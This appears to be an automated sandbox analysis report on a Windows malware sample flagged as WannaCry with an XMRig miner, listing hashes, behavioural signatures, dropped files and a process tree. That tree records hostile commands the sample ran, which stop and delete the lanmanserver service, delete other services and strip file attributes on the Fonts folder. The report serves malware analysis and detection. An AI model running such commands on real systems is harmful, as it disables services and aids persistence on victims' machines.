Analysis
-
max time kernel
203s -
max time network
210s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
08-07-2022 01:50
Behavioral task
behavioral1
Sample
42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe
Resource
win7-20220414-en
General
-
Target
42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe
-
Size
2.3MB
-
MD5
7b4f33a283fc64db1227f5d82db91a59
-
SHA1
f32ae945c419e09e3320686f2b9b419c346d76a3
-
SHA256
42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a
-
SHA512
7c59bc1028115acbda27245a8f14638892a3fbae1ac409ec62448f9ad580fd3051bdaef751b7d8f6e81df80a23098201de386082e229a768a6142a514ee85511
Malware Config
Signatures
-
Wannacry
WannaCry is a ransomware cryptoworm.
-
Detected Stratum cryptominer command 2 IoCs
Looks to be attempting to contact Stratum mining pool.
Processes:
svchost.exeKvMonXP.exepid process 5092 svchost.exe 3540 KvMonXP.exe -
XMRig Miner payload 5 IoCs
Processes:
resource yara_rule behavioral2/memory/4288-130-0x0000000000400000-0x0000000000656000-memory.dmp xmrig C:\Windows\Fonts\lsass.exe xmrig \??\c:\windows\Fonts\lsass.exe xmrig C:\Windows\Fonts\KvMonXP.exe xmrig \??\c:\windows\Fonts\KvMonXP.exe xmrig -
Executes dropped EXE 12 IoCs
Processes:
svchost.exesvchost.exesvchost.exesvchost.exesvchost.exelsass.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exeKvMonXP.exepid process 1824 svchost.exe 1732 svchost.exe 2444 svchost.exe 2088 svchost.exe 4120 svchost.exe 3296 lsass.exe 5092 svchost.exe 3684 svchost.exe 1844 svchost.exe 3104 svchost.exe 1132 svchost.exe 3540 KvMonXP.exe -
Modifies Windows Firewall 1 TTPs 4 IoCs
Processes:
netsh.exenetsh.exenetsh.exenetsh.exepid process 3672 netsh.exe 3152 netsh.exe 3504 netsh.exe 3472 netsh.exe -
Sets file to hidden 1 TTPs 7 IoCs
Modifies file attributes to stop it showing in Explorer etc.
Processes:
attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exepid process 4396 attrib.exe 1252 attrib.exe 2124 attrib.exe 4084 attrib.exe 3968 attrib.exe 4324 attrib.exe 2752 attrib.exe -
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule C:\Windows\Fonts\svchost.exe upx C:\Windows\Fonts\svchost.exe upx C:\Windows\Fonts\svchost.exe upx C:\Windows\Fonts\svchost.exe upx \??\c:\windows\Fonts\svchost.exe upx behavioral2/memory/1824-187-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral2/memory/1732-188-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral2/memory/2088-190-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral2/memory/2444-189-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral2/memory/1824-195-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral2/memory/1732-207-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral2/memory/2444-209-0x0000000140000000-0x0000000140053000-memory.dmp upx C:\Windows\Fonts\svchost.exe upx behavioral2/memory/4120-210-0x0000000140000000-0x0000000140053000-memory.dmp upx C:\Windows\Fonts\svchost.exe upx C:\Windows\Fonts\svchost.exe upx C:\Windows\Fonts\svchost.exe upx C:\Windows\Fonts\svchost.exe upx behavioral2/memory/5092-218-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral2/memory/5092-220-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral2/memory/3684-219-0x0000000140000000-0x0000000140053000-memory.dmp upx C:\Windows\Fonts\svchost.exe upx behavioral2/memory/1844-222-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral2/memory/2088-225-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral2/memory/1132-226-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral2/memory/3104-227-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral2/memory/4120-228-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral2/memory/1132-229-0x0000000140000000-0x0000000140053000-memory.dmp upx -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe -
Drops file in Windows directory 64 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exedescription ioc process File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\tasksche.exe attrib.exe File opened for modification C:\windows\debug\services.exe attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File created \??\c:\windows\hosts.bat 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File created \??\c:\windows\Fonts\svchost.exe 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe File opened for modification C:\Windows\svchost.exe attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification \??\c:\windows\Fonts\svchost.exe 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe -
Launches sc.exe 64 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 4836 sc.exe 2260 sc.exe 3684 sc.exe 4216 sc.exe 744 sc.exe 2112 sc.exe 3480 sc.exe 5024 sc.exe 4716 sc.exe 3520 sc.exe 3852 sc.exe 2708 sc.exe 4624 sc.exe 3100 sc.exe 4492 sc.exe 4084 sc.exe 3132 sc.exe 2412 sc.exe 3804 sc.exe 4140 sc.exe 4680 sc.exe 4524 sc.exe 1184 sc.exe 2180 sc.exe 2428 sc.exe 4060 sc.exe 3436 sc.exe 3404 sc.exe 4168 sc.exe 5064 sc.exe 3604 sc.exe 4676 sc.exe 4512 sc.exe 4484 sc.exe 1004 sc.exe 4396 sc.exe 752 sc.exe 4800 sc.exe 4656 sc.exe 4172 sc.exe 3880 sc.exe 1484 sc.exe 4996 sc.exe 3464 sc.exe 1924 sc.exe 1980 sc.exe 2544 sc.exe 5108 sc.exe 344 sc.exe 4504 sc.exe 3776 sc.exe 2832 sc.exe 4688 sc.exe 3116 sc.exe 2524 sc.exe 2984 sc.exe 2832 sc.exe 4656 sc.exe 4892 sc.exe 3476 sc.exe 1924 sc.exe 3828 sc.exe 3940 sc.exe 1096 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with WMI 23 IoCs
Processes:
WMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exepid process 1492 WMIC.exe 4184 WMIC.exe 4656 WMIC.exe 3144 WMIC.exe 3540 WMIC.exe 460 WMIC.exe 2164 WMIC.exe 2892 WMIC.exe 4940 WMIC.exe 4252 WMIC.exe 2300 WMIC.exe 4952 WMIC.exe 4960 WMIC.exe 4608 WMIC.exe 1596 WMIC.exe 3992 WMIC.exe 4764 WMIC.exe 3636 WMIC.exe 2476 WMIC.exe 1652 WMIC.exe 4544 WMIC.exe 4228 WMIC.exe 1812 WMIC.exe -
Kills process with taskkill 10 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 4440 taskkill.exe 1728 taskkill.exe 1828 taskkill.exe 3036 taskkill.exe 4960 taskkill.exe 4056 taskkill.exe 1916 taskkill.exe 4980 taskkill.exe 2336 taskkill.exe 1512 taskkill.exe -
Modifies registry class 1 IoCs
Processes:
42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
lsass.exepid process 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe 3296 lsass.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
WMIC.exeKvMonXP.exedescription pid process Token: SeIncreaseQuotaPrivilege 3144 WMIC.exe Token: SeSecurityPrivilege 3144 WMIC.exe Token: SeTakeOwnershipPrivilege 3144 WMIC.exe Token: SeLoadDriverPrivilege 3144 WMIC.exe Token: SeSystemProfilePrivilege 3144 WMIC.exe Token: SeSystemtimePrivilege 3144 WMIC.exe Token: SeProfSingleProcessPrivilege 3144 WMIC.exe Token: SeIncBasePriorityPrivilege 3144 WMIC.exe Token: SeCreatePagefilePrivilege 3144 WMIC.exe Token: SeBackupPrivilege 3144 WMIC.exe Token: SeRestorePrivilege 3144 WMIC.exe Token: SeShutdownPrivilege 3144 WMIC.exe Token: SeDebugPrivilege 3144 WMIC.exe Token: SeSystemEnvironmentPrivilege 3144 WMIC.exe Token: SeRemoteShutdownPrivilege 3144 WMIC.exe Token: SeUndockPrivilege 3144 WMIC.exe Token: SeManageVolumePrivilege 3144 WMIC.exe Token: 33 3144 WMIC.exe Token: 34 3144 WMIC.exe Token: 35 3144 WMIC.exe Token: 36 3144 WMIC.exe Token: SeIncreaseQuotaPrivilege 3144 WMIC.exe Token: SeSecurityPrivilege 3144 WMIC.exe Token: SeTakeOwnershipPrivilege 3144 WMIC.exe Token: SeLoadDriverPrivilege 3144 WMIC.exe Token: SeSystemProfilePrivilege 3144 WMIC.exe Token: SeSystemtimePrivilege 3144 WMIC.exe Token: SeProfSingleProcessPrivilege 3144 WMIC.exe Token: SeIncBasePriorityPrivilege 3144 WMIC.exe Token: SeCreatePagefilePrivilege 3144 WMIC.exe Token: SeBackupPrivilege 3144 WMIC.exe Token: SeRestorePrivilege 3144 WMIC.exe Token: SeShutdownPrivilege 3144 WMIC.exe Token: SeDebugPrivilege 3144 WMIC.exe Token: SeSystemEnvironmentPrivilege 3144 WMIC.exe Token: SeRemoteShutdownPrivilege 3144 WMIC.exe Token: SeUndockPrivilege 3144 WMIC.exe Token: SeManageVolumePrivilege 3144 WMIC.exe Token: 33 3144 WMIC.exe Token: 34 3144 WMIC.exe Token: 35 3144 WMIC.exe Token: 36 3144 WMIC.exe Token: SeIncreaseQuotaPrivilege 3540 KvMonXP.exe Token: SeSecurityPrivilege 3540 KvMonXP.exe Token: SeTakeOwnershipPrivilege 3540 KvMonXP.exe Token: SeLoadDriverPrivilege 3540 KvMonXP.exe Token: SeSystemProfilePrivilege 3540 KvMonXP.exe Token: SeSystemtimePrivilege 3540 KvMonXP.exe Token: SeProfSingleProcessPrivilege 3540 KvMonXP.exe Token: SeIncBasePriorityPrivilege 3540 KvMonXP.exe Token: SeCreatePagefilePrivilege 3540 KvMonXP.exe Token: SeBackupPrivilege 3540 KvMonXP.exe Token: SeRestorePrivilege 3540 KvMonXP.exe Token: SeShutdownPrivilege 3540 KvMonXP.exe Token: SeDebugPrivilege 3540 KvMonXP.exe Token: SeSystemEnvironmentPrivilege 3540 KvMonXP.exe Token: SeRemoteShutdownPrivilege 3540 KvMonXP.exe Token: SeUndockPrivilege 3540 KvMonXP.exe Token: SeManageVolumePrivilege 3540 KvMonXP.exe Token: 33 3540 KvMonXP.exe Token: 34 3540 KvMonXP.exe Token: 35 3540 KvMonXP.exe Token: 36 3540 KvMonXP.exe Token: SeIncreaseQuotaPrivilege 3540 KvMonXP.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exelsass.exepid process 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe 3296 lsass.exe 3296 lsass.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.execmd.exedescription pid process target process PID 4288 wrote to memory of 4232 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe cmd.exe PID 4288 wrote to memory of 4232 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe cmd.exe PID 4288 wrote to memory of 4232 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe cmd.exe PID 4288 wrote to memory of 4244 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 4288 wrote to memory of 4244 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 4288 wrote to memory of 4244 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 4288 wrote to memory of 4168 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 4288 wrote to memory of 4168 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 4288 wrote to memory of 4168 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 4288 wrote to memory of 4504 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 4288 wrote to memory of 4504 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 4288 wrote to memory of 4504 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 4288 wrote to memory of 4860 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 4288 wrote to memory of 4860 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 4288 wrote to memory of 4860 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 4288 wrote to memory of 4524 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 4288 wrote to memory of 4524 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 4288 wrote to memory of 4524 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 4288 wrote to memory of 1512 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 4288 wrote to memory of 1512 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 4288 wrote to memory of 1512 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 4288 wrote to memory of 2156 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 4288 wrote to memory of 2156 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 4288 wrote to memory of 2156 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 4288 wrote to memory of 1492 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 4288 wrote to memory of 1492 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 4288 wrote to memory of 1492 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 4288 wrote to memory of 4680 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 4288 wrote to memory of 4680 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 4288 wrote to memory of 4680 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 4288 wrote to memory of 2476 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 4288 wrote to memory of 2476 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 4288 wrote to memory of 2476 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 4288 wrote to memory of 5064 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 4288 wrote to memory of 5064 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 4288 wrote to memory of 5064 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 4288 wrote to memory of 4764 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 4288 wrote to memory of 4764 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 4288 wrote to memory of 4764 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 4288 wrote to memory of 4512 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 4288 wrote to memory of 4512 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 4288 wrote to memory of 4512 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 4288 wrote to memory of 3024 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 4288 wrote to memory of 3024 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 4288 wrote to memory of 3024 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 4288 wrote to memory of 4656 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 4288 wrote to memory of 4656 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 4288 wrote to memory of 4656 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 4288 wrote to memory of 4236 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 4288 wrote to memory of 4236 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 4288 wrote to memory of 4236 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 4288 wrote to memory of 3636 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 4288 wrote to memory of 3636 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 4288 wrote to memory of 3636 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 4288 wrote to memory of 1812 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 4288 wrote to memory of 1812 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 4288 wrote to memory of 1812 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 4288 wrote to memory of 3476 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 4288 wrote to memory of 3476 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 4288 wrote to memory of 3476 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe sc.exe PID 4288 wrote to memory of 3388 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 4288 wrote to memory of 3388 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 4288 wrote to memory of 3388 4288 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe net.exe PID 4232 wrote to memory of 2700 4232 cmd.exe attrib.exe -
Views/modifies file attributes 1 TTPs 64 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exepid process 2568 attrib.exe 2360 attrib.exe 2548 attrib.exe 3444 attrib.exe 3472 attrib.exe 2868 attrib.exe 2948 attrib.exe 3616 attrib.exe 4140 attrib.exe 4164 attrib.exe 3692 attrib.exe 680 attrib.exe 2716 attrib.exe 220 attrib.exe 3912 attrib.exe 4628 attrib.exe 1540 attrib.exe 2744 attrib.exe 652 attrib.exe 2788 attrib.exe 3188 attrib.exe 3144 attrib.exe 4184 attrib.exe 3476 attrib.exe 4160 attrib.exe 4212 attrib.exe 4492 attrib.exe 3952 attrib.exe 4324 attrib.exe 2124 attrib.exe 4084 attrib.exe 1176 attrib.exe 4844 attrib.exe 3544 attrib.exe 3652 attrib.exe 4172 attrib.exe 4000 attrib.exe 2964 attrib.exe 3248 attrib.exe 216 attrib.exe 4264 attrib.exe 2232 attrib.exe 3756 attrib.exe 4600 attrib.exe 4212 attrib.exe 1536 attrib.exe 4800 attrib.exe 4660 attrib.exe 4164 attrib.exe 3952 attrib.exe 2076 attrib.exe 2752 attrib.exe 4108 attrib.exe 2348 attrib.exe 2248 attrib.exe 4020 attrib.exe 3556 attrib.exe 1252 attrib.exe 4216 attrib.exe 2304 attrib.exe 3696 attrib.exe 2656 attrib.exe 3192 attrib.exe 1300 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe"C:\Users\Admin\AppData\Local\Temp\42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe"1⤵
- Checks computer location settings
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r -a %SystemRoot%\Fonts2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r -a C:\Windows\Fonts3⤵
-
C:\Windows\SysWOW64\net.exenet stop lanmanserver /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop lanmanserver /y3⤵
-
C:\Windows\SysWOW64\sc.exesc config lanmanserver start= DISABLED 2>nul2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete lanmanserver2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete mssecsvc2.02⤵
-
C:\Windows\SysWOW64\net.exenet stop mssecsvc2.02⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mssecsvc2.03⤵
-
C:\Windows\SysWOW64\sc.exesc delete mssecsvc2.12⤵
-
C:\Windows\SysWOW64\net.exenet stop ServiceSaims2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ServiceSaims3⤵
-
C:\Windows\SysWOW64\net.exenet stop mssecsvc2.12⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mssecsvc2.13⤵
-
C:\Windows\SysWOW64\net.exenet stop ServiceSais2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ServiceSais3⤵
-
C:\Windows\SysWOW64\sc.exesc delete ServiceSais2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete ServiceSaims2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\net.exenet stop HostManger2⤵
